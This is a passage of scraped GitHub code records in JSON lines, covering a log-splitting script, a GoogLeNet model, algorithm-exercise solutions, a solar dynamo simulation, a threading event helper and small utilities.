2:\n\t\tprint(\"Feil i string, forventet to bindestreker\")\n\t\treturn None\n\t\n\twhile (year is None):\n\t\twhile (month is None):\n\t\t\twhile (day is None):\n\t\t\t\t# print(\"Finn dagen\")\n\t\t\t\tday = f[8:10]\n\t\t\t\t# print(day)\n\t\t\t# print(\"Finn måneden\")\n\t\t\tmonth = f[5:7]\n\t\t\t# print(month)\n\t\t# print(\"Finn året\")\n\t\tyear = f[0:4]\n\t\t# print(year)\n\treturn (year,month,day)\n\n\tdagensdato = extractdate(f)\n\tprint(\"Dagens dato er: \"+str(dagensdato))\n\t\t\n\t# 19.03.2018 - Finne øverste dato og sjekk om folder finnes\n\n\twith open('temp.log') as fl:\n\t\tfirst_line = fl.readline().strip()\n\n\tprint(\"Første llinje: \"+str(first_line))\n\n\tfirstdate = extractdate(first_line)\n\n\t# Ønsker at det skal være tuple\n\t#print(\"Type: \"+str(type(firstdate)))\n\n\tprint(\"Øverste dato kan være: \"+str(firstdate))\n\n\t# Sjekk for folder\n\n\t# Allerede importert\n\t# import os\n\n\tcwd = os.getcwd()\n\tprint(\"Current Working Directory: \"+str(cwd))\n\n# fds = First Date String\ndef splittings(datefile,fds,logfile):\n\timport time\n\tprint(\"[Splittings] Will split \"+str(fds)+\" in \"+str(logfile)+\" and put it into \"+str(datefile))\n\t\n\tcwd = os.getcwd()\n\tprint(\"Current Working Directory: \"+str(cwd))\n\t\n\t# Sane checks\n\t\n\tfs = os.path.getsize(logfile)\n\tif (fs == 0):\n\t\tprint(\"FATAL ERROR, 0 bytes in logfile!\")\n\t\texit(666)\n\telse:\n\t\tprint(\"Current size of logfile is: \"+str(fs))\n\n\t# Det er ok om filen (datefile) finnes, men ikke hvis det er innhold\n\t# Vil alltid finnes pga checkfolder()\n\n\tfsd = os.path.getsize(datefile)\n\tif (fsd > 0): \n\t\tprint(\"FATAL ERROR, >0 bytes in datefile! 
\"+str(fsd)+\" bytes\")\n\t\ttime.sleep(5)\n\t\treturn(False)\n\t\n\t# Åpner original logfile som read\n\tlf = open(logfile,'r')\n\t\n\t# Åpner destination som write\n\tdest = open(datefile,'w')\n\tdestname = datefile\n\t\n\t# Åpner backup templog2.log som write\n\tlog2 = open(\"filtered.log\",'w')\n\tlog2name = \"/home/pi/pyscript/filtered.log\"\n\t\n\t# temp log file\n\tcount = 0\n\tantall = 0\n\t\n\t# Statistikk\n\twith open(logfile) as telle:\n\t\tfor line in telle:\n\t\t\tif fds in line:\n\t\t\t\tantall += 1\n\n\tprint(\"[Splittings] We have \"+str(antall)+\" occurances of the requested date\")\n\t\n\tif (antall == 0):\n\t\tprint(\"Fant ikke det jeg skulle, return False\")\n\t\treturn(False)\n\t\n\twith open(logfile) as tlf:\n\t\tfor line in tlf:\n\t\t\tcount = count+1\n\t\t\tif fds in line:\n\t\t\t\t# print(\"datostring funnet - linje \"+str(count))\n\t\t\t\tdest.write(line)\n\t\t\telse:\n\t\t\t\tif (count < antall):\n\t\t\t\t\tprint(\"Datostring ikke funnet - linje \"+str(count))\n\t\t\t\tif (len(line) > 30): \n\t\t\t\t\t# print(\"Writing to log2\")\n\t\t\t\t\tlog2.write(line)\n\t\t\t\telse: \n\t\t\t\t\tprint(Style.BRIGHT+Fore.RED+\"Error, line not long enough! \"+str(line).rstrip())\n\t\t\t\t\t# exit(\"sjekk line length\")\n\t\t\t\t\n\tprint(\"Done splitting files, sleeping for 3 seconds\")\n\ttime.sleep(3)\n\n\tdest.flush()\n\tdest.close()\n\t\n\tlog2.flush()\n\tlog2.close()\n\t\n\tfs2 = os.path.getsize(log2name)\n\tif (fs2 == 0): print(\"FATAL ERROR, 0 bytes!\"), exit(666)\n\t\n\tprint(\"Current size of filtered.log is: \"+str(fs2))\n\n\n\tprint(\"Renaming filtered.log to \"+str(logfile))\n\tos.rename(\"filtered.log\",logfile)\n\tprint(\"Renamed filtered.log to \"+str(logfile))\n\n\tprint(\"Rename succesful?\")\n\tprint(\"Gikk fra \"+str(fs)+\" bytes til \"+str(fs2)+\" bytes!\")\n\t\n\tdiff = fs-fs2\n\tprint(\"Differansen mellom gammel og ny logg: \"+str(diff))\n\t\n\tfs3 = os.path.getsize(datefile)\n\tprint(fs3)\n\t\n\tif (fs3 == diff): \n\t\tprint(Style.BRIGHT+Fore.GREEN+\"Veldig awesome, alt stemmer!\")\n\t\treturn(True)\n\telse: \n\t\tprint(\"fs3 er ikke det samme som diff\")\n\t\tprint(\"Sleeing for 20 seconds\")\n\t\ttime.sleep(20)\n\t\treturn(False)\n\t\n\t# 10.07.2018: Scriptet er egentlig avsluttet\n\t\n\t# True hvis ulik størrelse, endring ble gjort\n\t# False hvis samme størrelse, endring ble ikke gjort\n\tif (fs != fs2): return(True)\n\telse: return(False)\n\n\n# No longer needs dagensdato in arguments, just firstdate\ndef checkfolder(firstdate,sensor):\n\tprint(\"[Checkfolder]: \"+str(firstdate)+\" Sensor: \"+str(sensor))\n\t\n\t# print(\"[CheckFolder]: \"+str(firstdate)+\" \"+str(dagensdato))\n\n\t# Ting er visst ikke globale...\n\tcwd = os.getcwd()\n\t\n\t\n\t# year folder, month folder, \"filename.log\"\n\tyf = cwd+\"/\"+sensor+\"/\"+firstdate[0]\n\tym = cwd+\"/\"+sensor+\"/\"+firstdate[0]+\"/\"+firstdate[1]\n\tdatefile = ym+\"/\"+str(firstdate[2]+\".log\")\n\tprint(\"Datefile is: \"+str(datefile))\n\n\tprint(Style.BRIGHT+\"yf: \"+Style.NORMAL+str(yf))\n\tprint(Style.BRIGHT+\"ym: \"+Style.NORMAL+str(ym))\n\tprint(Style.BRIGHT+\"datefile: \"+Style.NORMAL+str(datefile))\n\n\tif not os.path.exists(yf):\n\t\tos.makedirs(yf)\n\t\tprint(\"FOLDER \"+str(yf)+\" created!\")\n\n\tif not os.path.exists(ym):\n\t\tos.makedirs(ym)\n\t\tprint(\"FOLDER \"+str(ym)+\" created!\")\n\n\tif not os.path.isfile(datefile):\n\t\topen(datefile,'x')\n\t\tprint(\"FILE \"+str(datefile)+\" created!\")\n\tstring = firstdate[0]+\"-\"+firstdate[1]+\"-\"+firstdate[2]\n\t\n\tfs = 
os.path.getsize(datefile)\n\tprint(\"Datefile \"+Style.BRIGHT+Fore.GREEN+\"exists: \"+Fore.WHITE+str(datefile)+\" Size: \"+str(fs))\n\t\n\t# exit(\"Check for size\")\n\t\n\t# 24.05.2018: Aner ikke hvorfor det er return her\n\t# return(datefile,string)\n\n\t# 24.05.2018: Som de er, siden funksjonen er ble kalt\n\treturn(datefile,True)\n\t\n\n# Sometimes, it is more fun to write things twice\n\ndef splittemp(firstdatel,lastdatel,sensor):\n\t# print(\"Type recieved: \"+str(type(firstdate)))\n\tassert(type(firstdatel) is list),\"splittemp did not recieve type list (but maybe string)\"\n\t\n\t# Only 1 argument needed, firstdate not lastdate\n\tdatefile,b = checkfolder(firstdatel,sensor)\n\t\n\t# First Date String\n\tfds = '-'.join(firstdatel)\n\tprint(\"[SplitTemp]: Firstdatel - fds - datefile - b\")\n\tprint(firstdatel,fds,datefile,b)\n\t\n\tlogfile = sensor+\"/temp.log\"\n\tresult = splittings(datefile,fds,logfile)\n\tprint(\"result (to be returned): \"+str(result))\n\t\n\treturn(result)\n\nfrom datetime import datetime\n\n# Mine egne funksjoner\ndef main():\n\t# 04.07.2018: Hvis split.py blir executa, så skjer det egentlig ingenting her\n\tfrom plotting import today\n\tfrom plotting import extractdate\n\n\tprint(Style.BRIGHT+\"Split \"+version()+Style.NORMAL+\" starting\")\n\n\tf = today()\n\tif f is None: \n\t\tprint(\"F finnes ikke\")\n\t\texit()\n\tdagensdato = extractdate(f)\n\tprint(\"Dagens dato er: \"+str(dagensdato))\n\nif __name__ == \"__main__\":\n # execute only if run as a script\n main()\n","repo_name":"mazter00/urdal","sub_path":"split.py","file_name":"split.py","file_ext":"py","file_size_in_byte":7367,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"72246635682","text":"'''GoogLeNet with PyTorch.'''\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport models.zhushuifa as zhushuifa\n\nclass Inception(nn.Module):\n def __init__(self, in_planes, n1x1, n3x3red, n3x3, n5x5red, n5x5, pool_planes):\n super(Inception, self).__init__()\n # 1x1 conv branch\n self.b1 = nn.Sequential(\n nn.Conv2d(in_planes, n1x1, kernel_size=1),\n nn.BatchNorm2d(n1x1),\n nn.ReLU(True),\n )\n\n # 1x1 conv -> 3x3 conv branch\n self.b2 = nn.Sequential(\n nn.Conv2d(in_planes, n3x3red, kernel_size=1),\n nn.BatchNorm2d(n3x3red),\n nn.ReLU(True),\n nn.Conv2d(n3x3red, n3x3, kernel_size=3, padding=1),\n nn.BatchNorm2d(n3x3),\n nn.ReLU(True),\n )\n\n # 1x1 conv -> 5x5 conv branch\n self.b3 = nn.Sequential(\n nn.Conv2d(in_planes, n5x5red, kernel_size=1),\n nn.BatchNorm2d(n5x5red),\n nn.ReLU(True),\n nn.Conv2d(n5x5red, n5x5, kernel_size=3, padding=1),\n nn.BatchNorm2d(n5x5),\n nn.ReLU(True),\n nn.Conv2d(n5x5, n5x5, kernel_size=3, padding=1),\n nn.BatchNorm2d(n5x5),\n nn.ReLU(True),\n )\n\n # 3x3 pool -> 1x1 conv branch\n self.b4 = nn.Sequential(\n nn.MaxPool2d(3, stride=1, padding=1),\n nn.Conv2d(in_planes, pool_planes, kernel_size=1),\n nn.BatchNorm2d(pool_planes),\n nn.ReLU(True),\n )\n\n def forward(self, x):\n y1 = self.b1(x)\n y2 = self.b2(x)\n y3 = self.b3(x)\n y4 = self.b4(x)\n return torch.cat([y1,y2,y3,y4], 1)\n\n\nclass GoogLeNetW(nn.Module):\n def __init__(self, mode = True, dim = 0):\n super(GoogLeNetW, self).__init__()\n self.zhushui = zhushuifa.zhushuilayer(0, dim)\n self.pingjun = zhushuifa.pingjunlayer(0, dim)\n self.mode = mode\n\n self.pre_layers = nn.Sequential(\n nn.Conv2d(3, 192, kernel_size=3, padding=1),\n nn.BatchNorm2d(192),\n nn.ReLU(True),\n )\n\n self.a3 = Inception(192, 64, 96, 128, 16, 32, 32)\n 
self.b3 = Inception(256, 128, 128, 192, 32, 96, 64)\n\n self.maxpool = nn.MaxPool2d(3, stride=2, padding=1)\n\n self.a4 = Inception(480, 192, 96, 208, 16, 48, 64)\n self.b4 = Inception(512, 160, 112, 224, 24, 64, 64)\n self.c4 = Inception(512, 128, 128, 256, 24, 64, 64)\n self.d4 = Inception(512, 112, 144, 288, 32, 64, 64)\n self.e4 = Inception(528, 256, 160, 320, 32, 128, 128)\n\n self.a5 = Inception(832, 256, 160, 320, 32, 128, 128)\n self.b5 = Inception(832, 384, 192, 384, 48, 128, 128)\n\n self.avgpool = nn.AvgPool2d(8, stride=1)\n self.linear = nn.Linear(1024, 10)\n\n def forward(self, x):\n out = self.pre_layers(x)\n if self.training == True:\n if self.mode:\n out = self.zhushui(out)\n else:\n out = self.pingjun(out)\n out = self.a3(out)\n out = self.b3(out)\n out = self.maxpool(out)\n if self.training == True:\n if self.mode:\n out = self.zhushui(out)\n else:\n out = self.pingjun(out)\n out = self.a4(out)\n out = self.b4(out)\n out = self.c4(out)\n out = self.d4(out)\n out = self.e4(out)\n out = self.maxpool(out)\n if self.training == True:\n if self.mode:\n out = self.zhushui(out)\n else:\n out = self.pingjun(out)\n out = self.a5(out)\n out = self.b5(out)\n out = self.avgpool(out)\n if self.training == True:\n if self.mode:\n out = self.zhushui(out)\n else:\n out = self.pingjun(out)\n out = out.view(out.size(0), -1)\n out = self.linear(out)\n return out\n\n\ndef test():\n net = GoogLeNetW()\n x = torch.randn(1,3,32,32)\n y = net(x)\n print(y.size())\n\n# test()\n","repo_name":"chalesguo/Info-SGD","sub_path":"models/googlenetwith.py","file_name":"googlenetwith.py","file_ext":"py","file_size_in_byte":4048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"32385083549","text":"import sys\n\ninput = sys.stdin.readline\n\n\n# node에 start ~ end정보 저장\ndef init_tree(node, start, end):\n if start == end:\n tree[node] = numbers[start]\n return tree[node] % 1000000007\n else:\n mid = (start + end) // 2\n tree[node] = init_tree(node * 2, start, mid) * init_tree(\n node * 2 + 1, mid + 1, end\n )\n return tree[node] % 1000000007\n\n\n# node: 현재 노드, start, end: 현재 노드 구간, l, r: 구하고자 하는 구간\ndef segment(node, start, end, l, r):\n if start > r or end < l:\n return 1\n if l <= start and end <= r:\n return tree[node] % 1000000007\n\n mid = (start + end) // 2\n return (\n segment(node * 2, start, mid, l, r)\n * segment(node * 2 + 1, mid + 1, end, l, r)\n % 1000000007\n )\n\n\n# node: 현재 노드, start, end: 현재 노드 구간, index : 변경하고자 하는 인덱스, value: 변경하고자 하는 목표값\ndef update(node, start, end, index, value):\n if not (start <= index <= end):\n return\n\n if start == end:\n tree[node] = value\n return\n\n mid = (start + end) // 2\n update(node * 2, start, mid, index, value)\n update(node * 2 + 1, mid + 1, end, index, value)\n\n tree[node] = (tree[node * 2] * tree[node * 2 + 1]) % 1000000007\n\n\nn, m, k = map(int, input().split())\nnumbers = [int(input()) for _ in range(n)]\n\ntree = [None] * (4 * n)\ninit_tree(1, 0, n - 1)\n\nfor _ in range(m + k):\n a, b, c = map(int, input().split())\n if a == 1:\n # b번째 수 c로 바꾸기\n update(1, 0, n - 1, b - 1, c)\n numbers[b - 1] = c\n elif a == 2:\n # b부터 c까지의 곱 구하기\n print(segment(1, 0, n - 1, b - 1, c - 1))\n","repo_name":"seongjaee/algorithm-study","sub_path":"Codes/BOJ/11505_구간곱구하기.py","file_name":"11505_구간곱구하기.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"43584586451","text":"import re\n\n\"\"\"Some 
application utility functions\"\"\"\n\n\ndef slugify(s):\n \"\"\"\n Simplifies ugly strings into something URL-friendly.\n From: http://blog.dolphm.com/slugify-a-string-in-python/\n \"\"\"\n s = s.lower()\n for c in [' ', '-', '.', '/']:\n s = s.replace(c, '_')\n s = re.sub('\\W', '', s)\n s = s.replace('_', ' ')\n s = re.sub('\\s+', ' ', s)\n s = s.strip()\n s = s.replace(' ', '-')\n\n return s\n\n\ndef form_has(form, key):\n \"\"\"Convenience function for checking whether a form\n request contains a non-empty attribute\n\n Arguments:\n form (werkzeug.datastructures.MultiDict) -- The form request dictionary\n key (string) -- The dictionary key to check\n\n Returns:\n boolean -- Whether the attribute exists and is non-empty\n \"\"\"\n\n return key in form and form[key].strip()\n","repo_name":"christiaan-lombard/udacityproject-item-catalog","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"25679752766","text":"# იუზერს ვეკითხებით სახელს გვარს შეფასებას\n#ვამოწმებთ სახელში 2ზე მეტი ასო აქვს ი\n# გვარი მთავრდება შვილზე\n# ქულა მეტია 50 ზე\n# დაპრინტოს დაფორმატებული ტექსტი თქვენ მოიგეთ სახელი გვარი ქულა\n\n#else\n# თქვენ წააგეთ სახელი გავარი ქულა\n\nname = input(\"sheitanet tkveni saxeli: \")\nsurname = input(\"sheitanet tkveni gvari: \")\ngrade = int(input(\"sheitanet qula: \"))\n\nwin =(\"you win , saxeli {}, gvari {}, qula {}\")\nloss =(\"you loss, saxeli {}, gvari {}, qula {}\")\n\nif name.count(\"i\")==2 and (surname[-6:])==\"shvili\" and grade >50:\n print(win.format(name,surname,grade))\nelse:\n print(loss.format(name,surname,grade))\n","repo_name":"geluch/geluch","sub_path":"day 2/day2_1/nomework.py","file_name":"nomework.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"ka","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"35073509905","text":"from egzP4btesty import runtests \r\n\r\nclass Node:\r\n def __init__(self, key, parent):\r\n self.left = None\r\n self.right = None\r\n self.parent = parent\r\n self.key = key\r\n self.x = None\r\n\r\n\r\ndef sol(root, T):\r\n def maximum(x):\r\n while x.right:\r\n x = x.right\r\n return x.key\r\n\r\n def minimum(x):\r\n while x.left:\r\n x = x.left\r\n return x.key\r\n\r\n def succ(x):\r\n if x.right:\r\n return minimum(x.right)\r\n else:\r\n while x.parent.key < x.key:\r\n x = x.parent\r\n if x.parent:\r\n return x.parent.key\r\n return None\r\n\r\n def pred(x):\r\n if x.left:\r\n return maximum(x.left)\r\n else:\r\n while x.parent.key > x.key:\r\n x = x.parent\r\n if x.parent:\r\n return x.parent.key\r\n return None\r\n\r\n result = 0\r\n for i in T:\r\n if 2*i.key == pred(i) + succ(i):\r\n result += i.key\r\n\r\n return result\r\n\r\n\r\nruntests(sol, all_tests=True)\r\n","repo_name":"Pawel-La/AlgorithmsAndDataStructures","sub_path":"exam_preperation/task4/egz4b/egzP4b.py","file_name":"egzP4b.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"43102861313","text":"from random import uniform, gauss\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom ddeint import ddeint\nfrom scipy.special import erf\n\n#omega_by_L = -0.34\n#alpha = 0.17\ntau = 1\nT0 =10\nT1 = 4\nBmin = 1\nBmax = 7\n\n\n\ndef past(t):\n return np.array([(Bmax + Bmin) / 2, (Bmax + Bmin) / 2])\n\n\ndef quenching(B):\n return (1 + erf(B**2 - Bmin**2)) * (1 - erf(B**2 - 
Bmax**2)) * 0.25\n\n\ndef model(Y, t,alpha):\n \"\"\"\n `omega`: differential rotation\n `L`: length scale of the differential rotation\n `aplha`: coeffecient of alpha-quenching\n `tau`: diffusion time-scale\n \"\"\"\n B_t, A_t = Y(t)\n _, A_T0 = Y(t - T0)\n B_T1, _ = Y(t - T1)\n dB = -2*alpha* A_T0 - (B_t / tau)\n dA = alpha * quenching(B_T1) * B_T1 - ( A_t / tau)\n return [dB, dA]\n\n\ntime_range = 1e3\ntime_steps = 1\ncutoff = 100\n\nfor i in range(70):\n\n #tau = tau1 + i*0.1\n alpha = -1+0.05*i\n N_D = -2*alpha **2 *tau**2 \n tt = np.linspace(0, time_range, int(time_range / time_steps + 1))\n yy = ddeint(model, tt, past, modelargs=(alpha,))\n\n fig, (ax1,ax2, ax3) = plt.subplots(3, 1, sharex=True)\n ax1.plot(tt[cutoff:], yy[cutoff:, 1], \"r\")\n ax1.set_ylabel(\"A\", fontsize=14)\n ax2.plot(tt[cutoff:], yy[cutoff:, 0], \"b\")\n ax2.set_ylabel(\"$B_\\phi$\", fontsize=14)\n ax3.plot(tt[cutoff:], np.square(yy[cutoff:, 0]), \"b\")\n ax3.set_ylabel(\"$B_\\phi^2$\", fontsize=14)\n ax3.set_xlabel(\"Time\", fontsize=14)\n fig.suptitle(f\"$N_D$={N_D:0.2f} $T_0$={T0} $T_1$={T1} $\\omega$/L={-2*alpha} $\\\\tau$={tau}\")\n plt.tight_layout()\n #plt.show()\n plt.savefig(str(N_D)+'.png')\n plt.clf\n","repo_name":"MASTERAMARJEET/SolarDynamo","sub_path":"plots.py","file_name":"plots.py","file_ext":"py","file_size_in_byte":1604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"38945148832","text":"import math\n\ndef GetV_i(index, r0, r1, r2, u1, u2, N):\n rho3 = 1.0 - (r0*(1-u1) / (r2 + r1 * u2))\n rho3 /= 1.0 - math.pow(r0*(1.0-u1) / (r2 + r1 * u2), N)\n \n V = []\n V_new = []\n V_lin = []\n \n for i in range(0,N+1):\n V.append(1.0 - float(i) / (N))\n V_new.append(V[i])\n V_lin.append(V[i])\n #print(\"V{0} = {1}\".format(i, V[i]))\n \n MAX_ITER = 1000\n MIN_CHANGE = 1e-10\n \n V1_old = V[1]\n \n for it in range(0, MAX_ITER):\n for i in range(1, N):\n nxt = V[i+1]\n prv = V[i-1]\n P_i = float(i*(N-i)) / (i*r1*(1.0-u2) + r0*(N-i))\n new = (r1*(1.0-u2) * nxt + r0 * prv)\n new = new / ((r1*u2*rho3)/P_i + r1*(1.0-u2) + r0)\n V_new[i] = new\n \n for i in range(1,N):\n V[i] = V_new[i] \n \n if abs(V[1] - V1_old) < MIN_CHANGE:\n #print(\"Converged in {0} steps.\".format(i))\n break\n V1_old = V[1]\n \n \n return V[index]\n\n","repo_name":"ccharlesgb/Stochastic-Cancer","sub_path":"OLD/Haeno/Vi.py","file_name":"Vi.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"19982125641","text":"# start : 1700\n# 문제정의 : tops 과 bottom의 주사위 리스트를 top이 같은 숫자가 되던, bottom이 같은 숫자가 되게끔 최소한의 스왑을 활용해서 만들어라\n# input : 2 tops,bottom 2*1e4 / 1 top[i],bottom[i] 6\n# output : 만들수 없을땐 -1 / 최소 회전 수\nclass Solution:\n def minDominoRotations(self, tops: List[int], bottoms: List[int]) -> int:\n \n # logic\n # bottom을 바꿀 건지 top을 바꿀건지 먼저 선택을 한다?\n # counter로 세서 확인가능 ??\n # 바꿀 리스트 결정 -> 가장 많은 수를 갖는 곳에서 부터는 안된다.\n # 같은 값을 갖는 곳을 탑기준으로 찾고,\n # 바꿀 리스트를 결정했다면, 어떻게 뽑을지를 결정하자 \n \n# topcount = collections.Counter(tops)\n# bottomcount = collections.Counter(bottoms)\n# # print(topcount,bottomcount)\n# topcount = sorted(topcount, key=lambda x : topcount[x])\n# bottomcount = sorted(bottomcount, key=lambda x : bottomcount[x])\n# # print(topcount,bottomcount)\n \n# if topcount[0] > bottomcount[0] :\n# for t\n \n sames = [tops[i] for i in range(len(tops)) if tops[i] == bottoms[i]]\n print(sames)\n samecount = collections.Counter(sames)\n bottomcount = collections.Counter(bottoms)\n topcount = 
collections.Counter(tops)\n \n for n in range(1,7):\n if bottomcount[n] + topcount[n] - samecount[n] == len(tops):\n return min(bottomcount[n], topcount[n]) - samecount[n]\n \n return -1","repo_name":"rohos119/daily_algorithm","sub_path":"1007-minimum-domino-rotations-for-equal-row/1007-minimum-domino-rotations-for-equal-row.py","file_name":"1007-minimum-domino-rotations-for-equal-row.py","file_ext":"py","file_size_in_byte":1652,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"31203148729","text":"from threading import Lock, Condition\nimport logging\nlogger = logging.getLogger('manager')\n\n\nclass Watcher:\n def __init__(self, callback, context):\n \"\"\"\n Params:\n callback - function to be called\n context - Event object\n \"\"\"\n self.callback = callback\n self.context = context\n \n def __eq__(self, other):\n if not isinstance(other, Watcher):\n return False\n if self.callback == other.callback and self.context == other.context:\n return True\n else:\n return False\n \n def __ne__(self, other):\n return not self.__eq__(other)\n \n def __call__(self):\n \"\"\"\n Watcher object is callable\n \"\"\"\n return self.callback( self.context )\n \n\ndef wait_multiple_callback(context):\n context.set()\n \n\nclass Wait(object):\n \"\"\"\n This is abstract class that provides multiple and single wait methods for Event objects\n \"\"\"\n def __init__(self):\n self.lock = Lock()\n self.watchers = []\n \n def add_watcher(self, callback, context):\n \"\"\"\n Add watcher object\n \n Params:\n callback : callable function\n context : Event object\n \"\"\"\n if not callable(callback):\n raise TypeError(\"Callback function must be callable\")\n return\n \n new_watcher = Watcher( callback, context)\n with self.lock:\n self.watchers.append(new_watcher)\n \n if self.is_set(): # called from Event\n logger.debug(\"Wait.add_watcher: watcher signalled during creation. Making callback immediately\")\n callback( context )\n \n def is_set(self):\n \"\"\"\n Abstract method. Must be impleemented in child class\n \"\"\"\n raise TypeError(\"Abstract method called. 
Must be implemented in Event\")\n \n def remove_watcher(self, callback, context):\n \"\"\"\n Remove watcher object from list\n \"\"\"\n new_watcher = Watcher( callback, context )\n with self.lock:\n for watcher in self.watchers[:]: # iterate through copy of the list\n if watcher == new_watcher:\n self.watchers.remove(watcher)\n return\n \n def notify(self):\n \"\"\"\n Notify watchers\n \"\"\"\n with self.lock:\n for watcher in self.watchers:\n watcher() # Watcher is callable\n \n @staticmethod\n def multiple( objects, num_objects=None, timeout = None):\n \"\"\"\"\n Wait for one of the multiple Events passed in a objects dictionary\n \n Params:\n objects : dictionary of objects derived from Event clas\n mum_objects : number of objects in dictionary\n timeout : timeout - None means forewer\n \n \"\"\"\n if num_objects == None:\n num_objects = len(objects)\n \n wait_event = Event(\"Watcher\")\n \n for i in range( num_objects ):\n objects[i].add_watcher( wait_multiple_callback, wait_event)\n \n res = -1\n sig = \"Signaled: \"\n if ( wait_event.wait( timeout ) ):\n for i in range( num_objects ):\n if objects[i].is_set():\n sig = sig + \"[%d]\" % i\n if res == -1: #catch first event only (lower has higier priority)\n res = i\n \n logger.debug(\"Wait.multiple: %s\" % sig )\n \n for i in range( num_objects ):\n objects[i].remove_watcher( wait_multiple_callback, wait_event )\n \n wait_event.clear()\n return res\n \n @staticmethod\n def single( single_object, timeout = None):\n \"\"\"\n Wait for single Event emulated with Wait.multiple\n \"\"\"\n objects = [single_object]\n return Wait.multiple(objects, 1 , timeout)\n\nclass Event(Wait):\n def __init__(self, name):\n self.__flag = False\n self.__name = name\n self.__cond = Condition(Lock())\n Wait.__init__(self) \n \n def __repr__(self):\n return self.__name\n \n def is_set(self):\n return self.__flag\n\n def set(self):\n self.__cond.acquire()\n try:\n self.__flag = True\n self.__cond.notify_all()\n finally:\n self.__cond.release()\n \n self.notify()\n \n def clear(self):\n self.__cond.acquire()\n try:\n self.__flag = False\n finally:\n self.__cond.release()\n \n def wait(self, timeout=None):\n self.__cond.acquire()\n try:\n signaled = self.__flag\n if not signaled:\n signaled = self.__cond.wait(timeout)\n return signaled\n finally:\n self.__cond.release() \n ","repo_name":"kstaniek/has","sub_path":"has/utils/event.py","file_name":"event.py","file_ext":"py","file_size_in_byte":5001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"12533483423","text":"import os\nimport itertools\n\nfrom p006 import sum_formula\n\n\ndef order_of_string(string: str) -> int:\n ''' Returns the numerical order of a upper case string. For example \"BABY\" is 2+1+2+25=30'''\n result = sum(ord(char) - ord('A') + 1 for char in string)\n return result\n\n\ndef neccesary_triangles(n: int) -> list[int]:\n '''Returns a list of all triangle numbers smaller or equal to n>=3'''\n triangle_numbers = []\n for k in itertools.count(1):\n triangle_number = sum_formula(k)\n if triangle_number > n:\n break\n else:\n triangle_numbers.append(triangle_number)\n return triangle_numbers\n\n\ndef main():\n ''' Returns the number of triangle word in the file p042_words.txt. 
\n Triangle words are words whose numerical value corresponds to a number of the form n*(n+1)/2.\n To this end, we convert the txt-file to a list of their corresponding numerical values.\n Then we compute all triangle numbers up to the maximum of list of numerical values.'''\n\n file_path = os.path.join(os.getcwd(), 'data', 'p042_words.txt')\n\n with open(file_path, 'r') as LIST_OF_WORDS:\n numerical_words = [order_of_string(\n word.strip('\"')) for word in LIST_OF_WORDS.read().split(',')]\n\n max_value = max(numerical for numerical in numerical_words)\n necc_triangles = neccesary_triangles(max_value)\n\n result = sum(\n 1 for numerical in numerical_words if numerical in necc_triangles)\n print(result)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"XASHA-XII/Euler_Project","sub_path":"problems/p042.py","file_name":"p042.py","file_ext":"py","file_size_in_byte":1517,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"18500952463","text":"import sys\n\n_, infile, outfile = sys.argv\nwords = []\nwordmap = {}\nindices = []\nbyte = lambda b: bytes((b,))\nw2i = lambda w: (w[1] << 8) | w[0]\nwith open(infile, \"rb\") as i:\n global data\n data = i.read()\n data = [data[i:i+2] for i in range(0,len(data),2)]\nitems = set(data)\nfreqs = {k: 0 for k in items}\nfor i in data:\n freqs[i] += 1\nitems = sorted(items, key=freqs.get, reverse=True)\nindices = {}\nfor i in range(len(items)):\n indices[items[i]] = i\nwith open(outfile, \"wb\") as o:\n o.write(byte(len(items)-1))\n o.write(b\"\".join(items))\n for d in data:\n o.write(byte(indices[d]))","repo_name":"PoolloverNathan/SuperTanks","sub_path":"qbw-compress.py","file_name":"qbw-compress.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"30978076432","text":"import pandas as pd\nimport Levenshtein\n\n# Function to asure tables have IDs for the Magellan pipeline.\ndef create_index_as_id (path):\n df = pd.read_csv(path)\n cols = df.columns.values.tolist()\n if 'ID' in cols:\n print(\"ID already exists!\")\n return\n else:\n df['ID'] = df.index + 1\n print(\"Creating indices...\")\n # Move ID column to first position. \n df = df[ ['ID'] + [ col for col in df.columns if col != 'ID' ] ]\n df.to_csv(path, index=False)\n print(\"Indicies created succesfully!\")\n\ndef create_index_as_id_for_dataframe (table):\n cols = table.columns.values.tolist()\n if 'ID' in cols:\n print(\"ID already exists!\")\n return table\n else:\n table['ID'] = table.index + 1\n print(\"Creating indices...\")\n # Move ID column to first position. 
